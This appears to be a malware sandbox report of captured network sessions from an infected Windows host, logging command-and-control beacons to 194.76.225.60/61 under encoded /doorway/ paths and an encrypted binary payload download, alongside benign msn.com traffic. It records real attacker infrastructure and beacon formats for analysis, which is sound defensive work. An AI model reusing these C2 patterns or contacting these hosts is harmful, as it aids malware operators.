49 2b 3b 5c 4e 6d cc 08 67 53 dc 87 49 e7 ec b7 8a a1 7e 10 6f 4c dc 49 93 d6 eb b7 64 5e 93 9f aa 84 8f a5 9c 17 84 5d cf 4e a1 55 c0 02 92 70 13 68 c7 9c b9 10 e5 1a 0d cf 2f 16 b7 4f d4 ce c5 1f 93 14 44 e1 5f 49 3d 92 54 11 76 9a c0 93 8b 67 f4 9c ba 8e 29 f6 21 3f d1 46 59 45 65 df 09 41 9e 95 10 08 ab 9b 38 39 bd f9 00 3f 33 34 af 87 7f b0 b8 3b 5b 62 5d 51 f1 e7 ec f0 43 62 b0 05 12 4b 11 f7 c0 43 0f 9f 49 39 c9 03 18 6f 1f dc 85 84 44 72 ce 2e e4 89 16 88 6c 1a 74 67 8b 40 13 f2 4c 14 b4 7a 9c 74 28 dc c8 ca 10 59 2b 6c cc bd 4b 3b f7 0b 17 1b d8 95 c0 37 94 91 d6 ec 50 94 e7 e8 2c 28 cc 7c f8 15 b0 75 c5 cb 93 31 fd 15 9e 25 7c 53 8b da e8 55 e7 67 f1 0b 3c 65 cc bf dd 0f 0d ea 79 ed 3a 68 a0 4c 3b 61 da f5 58 70 a0 89 9f 18 39 7d 1b b9 8f 8d 49 0d e4 65 4a 67 03 46 e2 e4 4b b3 65 f7 2d 0f 68 84 37 ba e3 d1 50 41 bc 62 4e b0 1b 4a f5 6c 6b 1f 26 c4 3a 0a a5 26 5a 4f 35 35 d3 ad 2d c7 01 b8 64 f5 da 25 9f d5 5a d6 f8 ab f8 d5 14 f6 9a 28 06 aa 55 80 9f 2a 51 6f cc 4d af 2a 88 bc f2 50 72 11 b5 7e e0 3b b8 f7 5f 5f f5 52 32 a3 be 70 4c 79 0a d8 45 5c b5 5b ca 11 2f 10 dd 20 02 f0 9e 2b 61 58 a2 58 98 51 bd b5 ba aa 6d 16 b7 12 8a 07 75 37 de c4 03 e4 5f 5e 3d fd 36 10 b5 43 5c e0 01 56 e1 69 af 3f a8 f6 01 19 4b 9d 5d 94 d4 2c 37 be 8d bb ea f5 d2 46 4e 2e 9d 07 42 f7 c9 05 4c 79 69 7e f5 a9 8e a9 34 5c 91 55 a1 97 56 63 b2 7e fd 01 72 7f 16 b1 9e df 83 ab 19 a5 9d 43 66 d2 f2 90 15 4f 7d 97 52 6c 3d c1 99 d4 0e c6 85 de f4 8c 29 66 fa 7b e5 9d 2e fa cf e5 86 ad 8f 34 42 ea 1f f6 8f 87 88 25 b0 fb 5e 42 65 a6 82 8e c1 a1 7c 2e fa cf 17 fb 88 77 32 ec e0 75 c5 0b 65 89 7e 8a d0 90 a4 19 db 19 80 d2 da c9 94 9d 11 cf 6c f6 ac 34 14 70 80 1d c1 e5 6e 38 a6 10 cb 18 cf 1a 7b 55 a6 0d 0b cf 05 40 55 cf 4b dd 45 12 dd 52 63 66 02 f2 08 80 62 e0 47 33 a0 5c 15 24 ee cb a4 d7 8d 34 d7 b2 ca 46 31 f9 d2 13 ca 33 8d ff 2d c2 b6 a9 f8 35 db 75 29 4a b5 06 3d 3e 8d de 11 39 f7 7d 71 0f 0a 3d d8 76 46 8a a3 9a 12 1d 80 0a dd 7d f3 0b d4 d3 ec 0e 76 4a de 0c c6 1e d6 89 e4 f7 eb 62 85 14 d0 f8 4c 07 a4 d1 Data Ascii: OI>$%_2hPdQG7dDxE-^_+L;=D<B=`MpawtU=VRFNfKjI8)]h_G%dGm[B?bH":ag{k%/tg6iQV"9-dVzNmp-o,J6;O=,{'xsb5I+;\NmgSI~oLId^]NUph/OD_I=Tvg)!?FYEeA89?34;[b]QCbKCI9oDr.ltg@Lzt(Y+lK;7P,(\|u1%\|SUg<ey:hL;aXp9}IeJgFKe-h7PAbNJlk&:&ZO55-d%Z(UQoMPr~;__R2pLyE\[/ +aXXQmu7_^=6C\Vi?K],7FN.BLyi~4\UVc~rCfO}Rl=)f{.4B%^Be\|.w2ue~l4pn8{U@UKERcfbG3\$4F13-5u)J=>9}q=vF}vJbL
Oct 11, 2022 15:01:58.649008036 CEST	860	OUT	GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.225.60 Connection: Keep-Alive Cache-Control: no-cache
Oct 11, 2022 15:01:58.903132915 CEST	861	OUT	GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.225.60 Connection: Keep-Alive Cache-Control: no-cache
Oct 11, 2022 15:01:59.095309973 CEST	862	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:01:59 GMT Content-Type: application/octet-stream Content-Length: 1810 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="634569470f551.bin" Data Raw: 64 b4 4d 32 b3 47 46 e5 a6 09 81 3e 92 0f 7d 6b a4 48 23 24 c6 fe 74 d3 20 c0 05 3d 9f d5 7e 7c 1b 1c 8f 43 e7 40 c4 d3 bd a7 4b cd e4 af 31 b6 45 37 bd 9f 22 6f 64 cb 56 0c 2f 84 93 3b 59 fc 9a db 03 82 38 91 07 12 ab 1b e0 c0 7e f1 10 01 a9 24 af 18 a4 9f a9 8d 8e 09 d0 8a 9f 76 6f a4 4d 3e 2e 8b 0f d5 f0 4b e8 10 ba fe 7b 57 60 12 f4 2f 4d 61 70 03 29 f4 a1 4f 4b cb 02 87 da 96 0b 32 5c 75 d1 fa 5c 0d 44 b9 9e 2e 31 6d 4f bd 5a 2f e5 61 22 83 50 a1 a9 93 7e 4a 25 58 ee 6b cd e2 7f d9 10 b3 7e 9e bb 2f 9a b8 07 81 48 fa 9f 97 ef 36 e1 26 c3 88 34 bb 49 3a e5 98 ba c8 9a f3 c8 73 6e 05 d3 85 1e 86 d0 ba 21 51 99 16 d0 14 d1 1e 18 e4 d4 89 8d d4 56 b1 ad 38 0a 03 dd 6b 6f 54 6a 9d 64 8f 9d d5 eb 37 26 c0 f5 82 a2 6e f6 8a b2 5f b4 d9 ac dc 86 58 4e be 6e 72 f1 a6 49 b9 48 42 9e b8 45 7d 1d 8a 4d 63 f6 c0 e5 79 0b 23 03 be d5 3a ba d7 40 97 75 66 8f d5 98 35 21 8e 6e 12 ff 8c 98 92 28 e9 ec 9c 42 0c 30 a9 9a 5e 9f b6 b5 d7 4d 24 73 69 76 dd 65 0b aa 1c 5b 9f 83 08 4d 93 27 f9 2b 51 27 b5 b6 76 c9 16 56 92 49 fe 6c 46 6c a0 14 31 69 aa fb 3e d5 bc d9 ca d6 69 d5 13 58 57 c5 21 59 86 48 64 fe 5f 96 72 4e 28 d8 f9 61 e4 e7 ea fb cc f0 be 00 06 50 ca db 50 0e b9 36 47 29 82 b5 dd f8 39 1a 77 61 7d 96 84 b9 5c 5c 36 5e a9 4f 4d 2f 2d b6 7e ad f8 a3 7d 37 5c 1e 1e ca 24 d1 e5 8c d3 a6 11 84 34 aa 20 b5 ba 13 35 1e 0e 94 61 bc 1e 8d b9 91 99 c2 b6 d2 c8 dc 94 7b 8d 1c ec 00 7b fe 38 79 eb d5 aa de b1 5a 46 89 b8 61 87 20 63 ac 75 a2 33 b4 b8 74 8a 93 60 7d 3e 33 25 ca 73 87 4d 61 c7 c6 39 15 88 09 ea cc a5 53 de 3d 39 5f 3c c1 71 d9 b7 0f 53 32 29 56 4c c4 ea 9a cf a4 3e 4b 0d de ad 7e 3e 68 43 d5 ac c0 92 39 2c b8 41 37 fc 66 3d ab ac fa 4a 3d 1c 60 ef 4d 8f 0f d1 5c 8e 67 cc 48 c2 ba da e2 ba b4 cc 71 e2 c0 70 f0 4d 4a 5b 39 89 01 55 ac 6d 93 15 c8 b2 45 53 15 14 e7 2c 19 23 78 36 ea 7e 9a 82 7c 62 eb 64 09 39 f9 6c ef 3a 49 b5 85 fb 37 82 c9 3b 44 43 43 15 1d 68 20 08 07 02 41 b5 d2 5b cc ba e6 13 2f 91 c6 d2 06 67 b0 db c3 68 d9 bf ce d9 58 3b 45 9f d8 c0 04 f2 f6 33 cd 1b c1 80 25 f1 ae f2 ad ba c4 81 41 8c 0e d3 40 c0 f4 1a 6d fa 1a 83 bd 7a f3 57 56 4d b4 bf 9f 07 75 b1 ec 64 95 af 0b fb 26 25 ed d2 4c d9 03 d6 d8 18 81 f3 73 ba e8 bb 9d 24 4b 32 bf 1f bb 7e 30 28 33 ae e6 61 eb 7c f8 f4 4f 50 82 a7 fa 03 63 54 03 cd e2 15 ad 68 d7 b9 17 66 ae 2b 61 28 9d bc 5a 10 9b 04 ec 34 32 88 f2 b0 f4 3e ec 4e d1 9a b3 db 48 38 3a 57 81 01 c8 89 94 45 ec ac 82 0a 1c e2 42 22 e8 2c 89 3e c1 0d 31 ed 32 aa 43 6a 84 93 85 06 3a cb 4a c3 d1 29 b6 19 32 53 94 52 e4 a9 4d 7e 6f c2 2c 2c 3f 28 66 d5 ef 12 f3 10 3f 95 6e 30 2e 7a b7 fc 5f 53 5b 79 22 e5 cc fa 02 bf 07 42 19 92 e5 5d 2e 91 18 49 1b e9 6f 83 89 bb 38 40 c0 d5 57 5f 98 82 a9 32 fe d7 ab e6 c8 94 3b d9 9b a0 b7 28 e2 85 f9 41 83 8c 50 91 a2 df 3b e4 25 3d 15 56 4b 8c 79 50 c1 88 17 d9 f9 64 9d 98 70 b9 c1 70 0a 0f f3 09 ff 1f 9a 37 5c 6d a5 Data Ascii: dM2GF>}kH#$t =~\|C@K1E7"odV/;Y8~$voM>.K{W`/Map)OK2\u\D.1mOZ/a"P~J%Xk~/H6&4I:sn!QV8koTjd7&n_XNnrIHBE}Mcy#:@uf5!n(B0^M$sive[M'+Q'vVIlFl1i>iXW!YHd_rN(aPP6G)9wa}\\6^OM/-~}7\$4 5a{{8yZFa cu3t`}>3%sMa9S=9_<qS2)VL>K~>hC9,A7f=J=`M\gHqpMJ[9UmES,#x6~\|bd9l:I7;DCCh A[/ghX;E3%A@mzWVMud&%Ls$K2~0(3a\|OPcThf+a(Z42>NH8:WEB",>12Cj:J)2SRM~o,,?(f?n0.z_S[y"B].Io8@W_2;(AP;%=VKyPdpp7\m

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49702	204.79.197.203	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2022 15:04:05.941225052 CEST	867	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: www.msn.com
Oct 11, 2022 15:04:06.009396076 CEST	868	IN	HTTP/1.1 302 Found Cache-Control: no-store, no-transform, no-cache Pragma: no-cache Content-Length: 142 Content-Type: text/html; charset=utf-8 Expires: -1 Location: http://www.msn.com/de-ch/ Vary: User-Agent Set-Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NTk3NzIzMjYsIlZlcnNpb24iOjF90; domain=msn.com; expires=Wed, 11-Oct-2023 13:04:05 GMT; path=/; HttpOnly Set-Cookie: marketPref=de-ch; domain=msn.com; expires=Wed, 11-Oct-2023 13:04:05 GMT; path=/; HttpOnly Access-Control-Allow-Methods: HEAD,GET,OPTIONS Access-Control-Allow-Origin: * X-AspNetMvc-Version: 5.2 X-AppVersion: 20220715_29743481 X-Activity-Id: 572b646e-3ee8-4645-b961-89a90ade942d X-Az: {did:2be360ae5c6345da911d978376c0449f, rid: 19, sn: neurope-prod-hp, dt: 2022-09-26T09:32:32.2409758Z, bt: 2022-07-15T00:17:15.0459229Z} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} X-UA-Compatible: IE=Ed Data Raw: Data Ascii:
Oct 11, 2022 15:04:06.009435892 CEST	869	IN	Data Raw: 65 3b 63 68 72 6f 6d 65 3d 31 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 58 2d 50 6f 77 65 72 65 Data Ascii: e;chrome=1X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-Powered-By: ASP.NETX-XSS-Protection: 1x-fabric-cluster: pmeprodneuX-Cache: CONFIG_NOCACHEX-MSEdge-Ref: Ref A: 572B646E3EE84645B96189A90ADE942D Ref B: FRA31EDGE
Oct 11, 2022 15:04:06.134025097 CEST	869	OUT	GET /de-ch/ HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: www.msn.com Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NTk3NzIzMjYsIlZlcnNpb24iOjF90; marketPref=de-ch
Oct 11, 2022 15:04:06.417062998 CEST	871	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-transform, no-cache Pragma: no-cache Content-Length: 300675 Content-Type: text/html; charset=utf-8 Expires: -1 Vary: User-Agent Set-Cookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NjE0OTA5OTMsIlZlcnNpb24iOjF90; domain=msn.com; expires=Wed, 11-Oct-2023 13:04:06 GMT; path=/; HttpOnly Access-Control-Allow-Methods: HEAD,GET,OPTIONS Access-Control-Allow-Origin: * X-AspNetMvc-Version: 5.2 X-AppVersion: 20220715_29743481 X-Activity-Id: acc2abc4-12b3-4823-b6aa-fc6407e9fd57 X-Az: {did:2be360ae5c6345da911d978376c0449f, rid: 19, sn: neurope-prod-hp, dt: 2022-09-26T09:32:32.2409758Z, bt: 2022-07-15T00:17:15.0459229Z} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} X-UA-Compatible: IE=Edge;chrome=1 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Powered-By: ASP.NET X-XSS-Protection: 1 x-fabric-cluster: pmeprodneu X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: ACC2ABC412B34823B6AAFC6407E9FD57 Ref B: FRA31EDGE0222 Ref C: 2022-10-11T13:04:06Z Date: Tue, 11 Oct 2022 13:04:05 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f Data Ascii: <!DOCTYPE html><html prefix="og: http:/
Oct 11, 2022 15:04:06.417105913 CEST	872	IN	Data Raw: 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 20 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 20 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 22 20 20 63 6c 61 73 Data Ascii: /ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" style="font-size:62.5%" class="hiperf" dir="ltr" > <head data-info="v:20220715_29743481;a:acc2abc4-12b3-4823-b6aa-fc6407e9fd57;cn:19;az:{did:2be360ae5c6345da911d978376c0449f, rid: 19,
Oct 11, 2022 15:04:06.417123079 CEST	873	IN	Data Raw: 61 70 69 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 3a 2f 2f 73 74 61 74 69 63 2d 67 6c 6f 62 61 6c 2d 73 2d 6d 73 6e 2d 63 6f 6d 2e 61 6b 61 6d 61 69 7a 65 64 2e 6e 65 74 2f 64 65 2d 63 68 2f 68 6f 6d 65 70 61 67 65 2f 61 70 69 2f 6d 6f Data Ascii: api":"http://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch","pdpdeltaupdateapi":"http://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata","xd":"bbqgbzw","s
Oct 11, 2022 15:04:06.417140007 CEST	875	IN	Data Raw: 2c 26 71 75 6f 74 3b 64 6f 6d 61 69 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 77 77 77 2e 6d 73 6e 2e 63 6f 6d 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 6f 63 61 6c 65 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 6c 61 6e 67 75 61 67 65 26 71 75 6f Data Ascii: ,"domain":"www.msn.com","locale":{"language":"de","script":"","market":"ch"},"os":"windows","pagetype":"startpage&quot
Oct 11, 2022 15:04:06.417157888 CEST	876	IN	Data Raw: 74 69 6d 65 6f 75 74 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 32 26 71 75 6f 74 3b 7d 2c 26 71 75 6f 74 3b 75 69 70 72 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 75 69 70 72 73 65 74 74 69 6e 67 73 26 71 75 6f 74 3b 3a 7b 26 71 75 6f Data Ascii: timeout":"2"},"uipr":false,"uiprsettings":{"enabled":false,"frequency_minutes":0,"banner_delay_minutes":null,"maxfresh_display":null,"minfresh_count":"0&
Oct 11, 2022 15:04:06.417174101 CEST	877	IN	Data Raw: 61 75 74 68 74 2c 31 73 2d 78 61 70 73 65 67 6d 65 6e 74 2c 31 73 2d 78 61 70 6e 74 70 73 65 67 2c 6a 30 37 33 39 39 32 33 2c 69 6e 66 72 61 2d 63 65 74 6f 2d 77 69 6e 2d 63 26 61 6d 70 3b 63 73 6f 70 64 3d 32 30 32 31 30 37 32 32 31 36 34 31 31 Data Ascii: autht,1s-xapsegment,1s-xapntpseg,j0739923,infra-ceto-win-c&csopd=20210722164117&csopdb=20220120005548" data-required-ttvr="["TTVR.SearchBox","TTVR.Infopane"]"> <script>if (window && (typeof
Oct 11, 2022 15:04:06.417191982 CEST	878	IN	Data Raw: 6e 64 6f 77 73 20 4c 69 76 65 2c 20 4f 66 66 69 63 65 20 33 36 35 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 65 77 73 20 61 75 73 20 50 6f 6c 69 74 69 6b Data Ascii: ndows Live, Office 365</title><meta name="description" content="News aus Politik, Sport, Finanzen, Wetter, Entertainment, Reisen, Auto und Lifestyle. Anmeldung fr Ihr Email Postfach bei Hotmail Outlook oder Login bei Skype und Office 365"/
Oct 11, 2022 15:04:06.417208910 CEST	880	IN	Data Raw: 73 6f 70 64 62 3d 32 30 32 32 30 31 32 30 30 30 35 35 34 38 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f Data Ascii: sopdb=20220120005548" type="text/css" media="all" /><script>(function(n,t){function p(n,t){var i=n.createElement("p"),r=n.getElementsByTagName("head")[0]\|\|n.documentElement;return i.innerHTML="x<style>"+t+"<\/style>",r.insertBefore(i.lastChild
Oct 11, 2022 15:04:06.417227030 CEST	881	IN	Data Raw: 43 53 53 7c 7c 66 7c 7c 75 2e 68 61 73 43 53 53 7c 7c 28 75 2e 68 61 73 43 53 53 3d 21 21 70 28 6e 2c 22 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 Data Ascii: CSS\|\|f\|\|u.hasCSS\|\|(u.hasCSS=!!p(n,"article,aside,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}")),i\|\|b(n,u),n}var u=n.html5\|\|{},v=/^<\|^(?:button\|map\|select\|textarea\|object\|iframe\|option\|
Oct 11, 2022 15:04:06.417243958 CEST	882	IN	Data Raw: 29 7b 74 79 70 65 6f 66 20 6e 21 3d 22 73 74 72 69 6e 67 22 26 26 28 72 3d 69 2c 69 3d 6e 2c 6e 3d 74 29 3b 69 26 26 69 2e 73 70 6c 69 63 65 7c 7c 28 72 3d 69 2c 69 3d 5b 5d 29 3b 6e 3d 3d 69 74 3f 61 3d 21 30 3a 6e 3d 3d 72 74 26 26 28 76 3d 21 Data Ascii: ){typeof n!="string"&&(r=i,i=n,n=t);i&&i.splice\|\|(r=i,i=[]);n==it?a=!0:n==rt&&(v=!0);l(n,i,r,!1,!1)}function l(n,t,i,r,f,e){var s,y;if(!n\|\|!c[n]){var h=ot(n,t),o=h.dependencyNotFound,l=h.resolved;if(o){typeof u[o]=="undefined"&&(u[o]=[]);u[o].
Oct 11, 2022 15:04:22.319344997 CEST	1225	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: www.msn.com Cookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NjE0OTA5OTMsIlZlcnNpb24iOjF90; marketPref=de-ch
Oct 11, 2022 15:04:22.371227026 CEST	1250	IN	HTTP/1.1 302 Found Cache-Control: no-store, no-transform, no-cache Pragma: no-cache Content-Length: 142 Content-Type: text/html; charset=utf-8 Expires: -1 Location: http://www.msn.com/de-ch/ Vary: User-Agent Set-Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI2MjMzNjk0MDQsIlZlcnNpb24iOjF90; domain=msn.com; expires=Wed, 11-Oct-2023 13:04:22 GMT; path=/; HttpOnly Set-Cookie: marketPref=de-ch; domain=msn.com; expires=Wed, 11-Oct-2023 13:04:22 GMT; path=/; HttpOnly Access-Control-Allow-Methods: HEAD,GET,OPTIONS Access-Control-Allow-Origin: * X-AspNetMvc-Version: 5.2 X-AppVersion: 20220715_29743481 X-Activity-Id: 24faa64c-a2a9-417e-9e2a-7782890b507f X-Az: {did:2be360ae5c6345da911d978376c0449f, rid: 19, sn: neurope-prod-hp, dt: 2022-09-26T09:32:32.2409758Z, bt: 2022-07-15T00:17:15.0459229Z} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} X-UA-Compatible: IE=Ed Data Raw: Data Ascii:
Oct 11, 2022 15:04:22.372000933 CEST	1251	OUT	GET /de-ch/ HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: www.msn.com Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI2MjMzNjk0MDQsIlZlcnNpb24iOjF90; marketPref=de-ch
Oct 11, 2022 15:04:22.571872950 CEST	1253	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-transform, no-cache Pragma: no-cache Content-Length: 300865 Content-Type: text/html; charset=utf-8 Expires: -1 Vary: User-Agent Set-Cookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgzMjYyNjI2MjQ2MTk0MzksIlZlcnNpb24iOjF90; domain=msn.com; expires=Wed, 11-Oct-2023 13:04:22 GMT; path=/; HttpOnly Access-Control-Allow-Methods: HEAD,GET,OPTIONS Access-Control-Allow-Origin: * X-AspNetMvc-Version: 5.2 X-AppVersion: 20220715_29743481 X-Activity-Id: 59012c9b-3150-44ff-b43b-01ecb8faae96 X-Az: {did:2be360ae5c6345da911d978376c0449f, rid: 19, sn: neurope-prod-hp, dt: 2022-09-26T09:32:32.2409758Z, bt: 2022-07-15T00:17:15.0459229Z} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} X-UA-Compatible: IE=Edge;chrome=1 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Powered-By: ASP.NET X-XSS-Protection: 1 x-fabric-cluster: pmeprodneu X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 59012C9B315044FFB43B01ECB8FAAE96 Ref B: FRA31EDGE0222 Ref C: 2022-10-11T13:04:22Z Date: Tue, 11 Oct 2022 13:04:21 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f Data Ascii: <!DOCTYPE html><html prefix="og: http:/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49703	194.76.225.61	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2022 15:04:22.660669088 CEST	1572	OUT	GET /doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 194.76.225.61 Connection: Keep-Alive Cache-Control: no-cache
